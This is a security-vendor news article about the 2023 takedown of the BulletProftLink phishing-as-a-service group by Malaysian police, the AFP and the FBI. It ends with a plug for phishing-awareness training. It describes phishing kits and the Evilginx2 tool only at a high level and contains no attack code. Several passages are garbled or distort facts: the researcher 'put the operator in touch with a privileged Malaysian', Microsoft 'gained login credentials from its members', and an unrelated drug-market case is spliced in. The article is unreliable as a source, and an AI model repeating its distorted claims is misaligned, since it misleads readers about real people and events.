Phishing attack

BulletProftLink Phishing (PHAAS) Group Taken Down by Malaysian Law enforcement

BulletProftLink phishing-as-a-service (PhaaS) group was effectively taken down by the Royal Malaysian Law enforcement. This effort resulted in the shutdown of several domains affiliated with the cybercriminal network.

The breakdown of this network is a huge step forward in the offensive against cybercrime, showing the worldwide effort to improve web privacy and secure users from phishing attacks.

The activity, which began in 2015, initially went unnoticed by researchers but got popularity in 2018. It became increasingly active as it attracted thousands of customers, some of whom paid for access to credential logs.

PhaaS systems provide pre-made kits and templates to attackers, making it easy for them to initiate phishing attacks. These services include tools for reverse proxying, credential harvesting, page hosting, and customisation.

Cybersecurity expert Gabor Szathmari connected the previously revealed BulletProftLink operation in 2020. He put the operator of the service in touch with a privileged Malaysian.

In September 2021, Microsoft research brought to light issues over the platform’s facilitation of phishing attacks and the increasing number of downloadable templates. Furthermore, the company gained login credentials from its 1,618 members that were stolen using phishing attacks.

The Royal Malaysia Law enforcement, in collaboration with the Australian Federal Police (AFP) and the U.S. Federal Bureau of Investigation (FBI), conducted an operation on November 6, 2023. Analysis revealed that the threat actors responsible for the platform were working inside the country, leading this joint effort.

According to the New Straits Times, eight people ranging in age from 29 to 56 have been caught in Sabah, Selangor, Perak, and Kuala Lumpur. Those who have been arrested include the syndicate’s mastermind. In addition to arresting the suspects, authorities recovered servers, laptops, jewellery, automobiles, and bitcoin wallets worth over $213,000.

Law enforcement launched an investigation to identify platform users after seizing the servers. Notably, some customers were paying a premium membership cost of $2,000 each month for exclusive access to regular credentials.

According to cybercrime intelligence service Intel471, BulletProftLink, also known as BulletProofLink, has 8,138 active members. These customers had access to a vast availability of 327 templates for phishing web pages.

Active Users Stats for BulletProftLink Dashboard
Active Users Stats for BulletProftLink Dashboard (Intel471)

In just two years, the client base has increased by an incredible 403%, as shown in Microsoft’s 2021 report. This alarming rise shows how widely used the platform is in the world of cybercrime.

Additionally, Inter471 claimed in a statement:

BulletProftLink is associated with the threat actor AnthraxBP who also went by the online nicknames TheGreenMY and AnthraxLinkers. The actor maintained an active website advertising phishing services. The actor has an extensive underground footprint and operated on a number of clear web underground forums and Telegram channels using multiple handles.

Intel 471 reports that the phishing resources from BulletProftLink, available before its takedown, contained fake login pages for trusted platforms like Microsoft Office, DHL, and Naver, a South Korea-based online platform. These illegal resources also targeted financial companies including Bank of America, American Express, Consumer Credit Union, and Royal Bank of Canada.

BulletProftLink website offers phishing pages for sale
BulletProftLink website offers phishing pages for sale (Intel471)

Some phishing URLs discovered not only attacked innocent visitors, but also cleverly used trusted cloud services such as Google Cloud and Microsoft Azure. This smart technique allows them to evade detection by email security tools.

In addition, BulletProftLink’s arsenal contains the Evilginx2 reverse-proxying tool. This programme gives attackers the ability to conduct adversary-in-the-middle (AITM) phishing attacks, which are capable of bypassing multi-factor authentication methods.

Threat actors are constantly improving their techniques in response to disruptions, as seen by the changing environment of AiTM attacks. Notably, these attacks increasingly make use of intermediate URLs included in documents posted on file-sharing services such as DRACOON. These documents include URLs that connect to malicious software.

Milomir Desnica, a 33-year-old man of Serbian and Croatian descent, is the focus of the most recent events. Desnica has confessed guilt in the United States, admitting to controlling the Monopoly Market dark web drug trafficking network. He pleaded guilty to conspiracy to deliver more than 30 kilogrammes of methamphetamine to the public in the United States.

In 2019, Desnica created an illegal marketplace that operated until December 2021. A concerted operation comprising officials from Finland, Germany, and the United States succeeded in taking the platform down.

In November 2022, authorities captured Desnica, the mastermind, in Austria, later extraditing him to the U.S. for drug-trafficking charges. The global effort resulted in the closure of this fraudulent company, showing the success of global cooperation in tackling cyberattacks.

Phishing attacks are on the rise, and it is important to protect your organisation. One effective way to do this is by increasing user awareness about these types of attacks. Phishing Tackle is a great resource that can help you in this regard. They offer a free 14-day trial to help train your users to recognise and avoid phishing attacks. 

Although technology can be helpful, it cannot spot 100% of phishing emails. Therefore, user education is important to minimising the impact of any successful attacks. Consulting with Phishing Tackle can provide valuable insights and tools to help you strengthen your defences against phishing attacks.

Recent posts